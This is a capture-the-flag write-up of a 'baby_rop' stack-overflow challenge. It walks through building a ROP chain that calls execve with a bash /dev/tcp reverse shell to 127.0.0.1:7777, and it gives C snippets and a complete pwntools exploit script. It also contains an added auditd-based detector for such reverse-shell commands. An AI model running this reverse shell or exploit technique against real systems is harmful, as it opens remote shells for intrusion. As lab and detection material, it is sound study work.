execve reverse shell

Aryb1n, July 08, 2018

The first challenge at 铁三 was baby_rop.

My first thought was roughly: a stack overflow in a statically linked binary, so ROPgadget's ropchain should be enough.

Newline turned out to be a bad character... after a lot of painful fiddling I patched that up.

I also hit a pitfall while looking for int 80h... I am never using --only again.

Anyway, I finally got the shellcode right... and the result was GG: in gdb I could see the shell start, but it would not connect back. It just would not connect back, ugh.

My guess was that the challenge is a server which forks a child process to handle the user input... could the fork be to blame?

In the end I thought of an execve reverse shell. My first idea was nc... but after checking... the nc shipped with Ubuntu has no -e option.

So a plain bash reverse shell it was... however...

I ran into a pitfall.
At first I wrote it like this:

/* Does not work: execve hands every element to sh as a literal argument,
   so ">&" and "0>&1" are never parsed as redirections; sh -i tries to
   open ">&" as a script file instead. */
char *arguments[7]= {
    "/bin/sh",
    "-i",
    ">&",
    "/dev/tcp/127.0.0.1/7777",
    "0>&1",
    NULL
};
execve("/bin/sh", arguments, NULL);

Result... a million errors; I fiddled with it for ages and it still would not work...

In the end I found the correct way: don't call -i directly, go through -c first.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    /* With -c the whole command line is handed to sh as one string,
       so sh itself parses the redirections before starting bash -i. */
    char *arguments[7]= {
        "/bin/sh",
        "-c",
        "/bin/bash -i >& /dev/tcp/127.0.0.1/7777 0>&1",
        NULL
    };
    execve("/bin/sh", arguments, NULL);
    return 0;
}
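The security-relevant lesson of the two snippets above is that execve interprets nothing: the command a monitoring tool should look at is the string behind `sh -c`, not argv[0]. The following detection example is added here and is not part of the original post. It builds a few EXECVE records in the shape auditd emits (the quoting/hex-encoding rule is assumed, and every record is constructed from the argv vectors in this post), reassembles argv, finds the string a `-c` shell would parse (handling clustered flags like the post's `-cvv`), and flags `/dev/tcp/` redirections and `-i >&` combinations. It also flags the literal-argv variant, which never works as a shell but is still worth an alert.

```python
import re

# Constructed argv vectors, shaped like the ones in the write-up (not real log data).
SAMPLES = {
    "fixed":   ["/bin/sh", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/7777 0>&1"],
    "padded":  ["/bin//sh", "-cvv", "/bin//bash -i >& /dev/tcp/127.0.0.1/7777 0>&1"],
    "literal": ["/bin/sh", "-i", ">&", "/dev/tcp/127.0.0.1/7777", "0>&1"],
    "benign":  ["/bin/sh", "-c", "ls -l /tmp"],
    "plain":   ["ls", "-l"],
}

def audit_encode(arg):
    """Render one EXECVE argument as auditd does: quoted, or hex-encoded when it
    contains a space, a double quote or a non-printable byte (assumed rule, used
    only to build the constructed sample records)."""
    if any(ch == '"' or not (0x21 <= ord(ch) <= 0x7e) for ch in arg):
        return arg.encode().hex().upper()
    return '"' + arg + '"'

def make_record(serial, argv):
    fields = " ".join("a%d=%s" % (i, audit_encode(a)) for i, a in enumerate(argv))
    return "type=EXECVE msg=audit(1531008000.000:%d): argc=%d %s" % (serial, len(argv), fields)

def sample_records():
    return [make_record(n, argv) for n, argv in enumerate(SAMPLES.values(), start=1)]

ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def parse_execve(record):
    """Reassemble argv from an EXECVE record; hex-encoded fields are decoded."""
    if not record.startswith("type=EXECVE "):
        return None
    args = {}
    for m in ARG_RE.finditer(record):
        quoted, hexed = m.group(2), m.group(3)
        args[int(m.group(1))] = quoted if quoted is not None else bytes.fromhex(hexed).decode(errors="replace")
    return [args[i] for i in sorted(args)]

SHELLS = {"sh", "bash", "dash", "zsh"}

def shell_command(argv):
    """Return the string a -c shell will parse, or None. Option clusters such as
    -cvv count as -c; the first non-option word is the command string."""
    if not argv or argv[0].rsplit("/", 1)[-1] not in SHELLS:
        return None
    saw_c = False
    for arg in argv[1:]:
        if arg.startswith("-") and len(arg) > 1 and not arg.startswith("--"):
            saw_c = saw_c or "c" in arg
            continue
        return arg if saw_c else None
    return None

NET_PATH = re.compile(r"/dev/(tcp|udp)/[^\s/]+/\d+")

def classify(argv):
    """Reasons this execve looks like a reverse-shell attempt (empty list if none)."""
    reasons = []
    cmd = shell_command(argv)
    if cmd is not None:
        m = NET_PATH.search(cmd)
        if m:
            reasons.append("shell -c string opens " + m.group(0))
        if re.search(r"\s-i\b", cmd) and ">&" in cmd:
            reasons.append("interactive shell with stdout/stderr redirected")
    else:
        hits = [a for a in argv if NET_PATH.search(a)]
        if hits:
            reasons.append("argv carries a network pseudo-device path: " + hits[0])
    return reasons

def scan(records):
    """Return (serial, argv, reasons) for every EXECVE record that classify() flags."""
    flagged = []
    for rec in records:
        argv = parse_execve(rec)
        if argv is None:
            continue
        reasons = classify(argv)
        if reasons:
            serial = int(rec.split("):")[0].rsplit(":", 1)[1])
            flagged.append((serial, argv, reasons))
    return flagged

if __name__ == "__main__":
    for serial, argv, reasons in scan(sample_records()):
        print(serial, argv, reasons)
```

The `/bin//sh` and `-cvv` spellings from later in this post pass straight through: the basename check and the flag-cluster handling are what keep such padding tricks from slipping past a naive `argv == ["/bin/sh", "-c", ...]` match.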

With that settled, I wrote the shellcode to match.

Because of alignment I changed the string slightly:

/bin//sh -cvv /bin//bash -i >& /dev/tcp/127.0.0.1/7777 0>&1

Split into four-byte chunks, that is...

=> 0x080ed060
 /bin
 //sh

=> 0x080ed069
 -cvv

=> 0x080ed06e
 /bin
 //ba
 sh -
 i >&
 /dev
 /tcp
 /127
 .0.0
 .1/7
 777 
 0>&1

=> 0x080ed104 (I first used 0x080ed100, without noticing that the \x00 in it would GG)
 0x080ed060
 0x080ed060
 0x080ed060

For storing the strings: since execve's first argument and the first element of the arg array are the same string, I simply reused it...

Finally, fill in the arguments, load execve's syscall number 11, and make the call:

EAX = 11
EBX = 0x080ed060
ECX = 0x080ed104
EDX = NULL

int 80h

Which is equivalent to

char *arg[] = {"/bin//sh", "-cvv", "/bin//bash -i >& /dev/tcp/127.0.0.1/7777 0>&1", NULL};
execve("/bin//sh", arg, NULL);

To pad it out to four bytes... I brute-forced -c into -cvv... it cracks me up.

And then it worked.

Remember to start nc listening first, then run the script.

# author: Aryb1n
# pwntools exploit script (Python 2: str and packed bytes concatenate directly)
from pwn import *
from struct import pack

p = remote("localhost", 7745)

p.send(p32(0x500))

pay = ''

#----------------------------------------------- "/bin//sh\0" @ .data
pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed060) # @ .data
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/bin'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding (consumed by pop ebx)

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed064) # @ .data + 4
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '//sh'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed068) # @ .data + 8 (NUL terminator of "/bin//sh")
pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

#----------------------------------------------- "-cvv\0" @ .data + 9
pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed069) # @ .data + 9
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '-cvv'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed06d) # @ .data + 13 (NUL terminator of "-cvv")
pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

#----------------------------------------------- command string @ .data + 14
pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed06e) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/bin'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed072) # @ .data + 18
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '//ba'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed076) # @ .data + 22
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += 'sh -'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed07a) # @ .data + 26
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += 'i >&'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed07e) # @ .data + 30
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/dev'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed082) # @ .data + 34
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/tcp'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed086) # @ .data + 38
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/127'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed08a) # @ .data + 42
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '.0.0'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed08e) # @ .data + 46
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '.1/7'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed092) # @ .data + 50
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '777 '
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed096) # @ .data + 54
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '0>&1'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed09a) # @ .data + 58 (NUL terminator of the command string)
pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

#----------------------------------------------- argv array @ .data + 164
pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed104) # @ .data + 164 (argv[0])
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += pack('<I', 0x080ed060) # -> "/bin//sh"
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed108) # @ .data + 168 (argv[1])
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += pack('<I', 0x080ed069) # -> "-cvv"
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed10c) # @ .data + 172 (argv[2]; argv[3] relies on .data already being zero)
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += pack('<I', 0x080ed06e) # -> "/bin//bash -i >& /dev/tcp/127.0.0.1/7777 0>&1"
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx ; ret
pay += pack('<I', 0xdeedbeef) # padding
#----------------------------------------------- execve(ebx, ecx, edx)

pay += pack('<I', 0x080481c5) # pop ebx ; ret
pay += pack('<I', 0x080ed060) # ebx = pathname "/bin//sh" @ .data

pay += pack('<I', 0x08083ca3) # pop ecx ; ret
pay += pack('<I', 0x080ed104) # ecx = argv array @ .data + 164

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed09a) # edx = envp: points at the zero bytes @ .data + 58, so it reads as an empty envp

pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret   (11 times: eax = 11 = execve on i386)
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807181f) # int 0x80

p.sendline("cccc:" + "b" * 60 + 'd' * 44 + pay)
p.interactive()

The comments about .data may have problems; too lazy to fix them... exhausted ==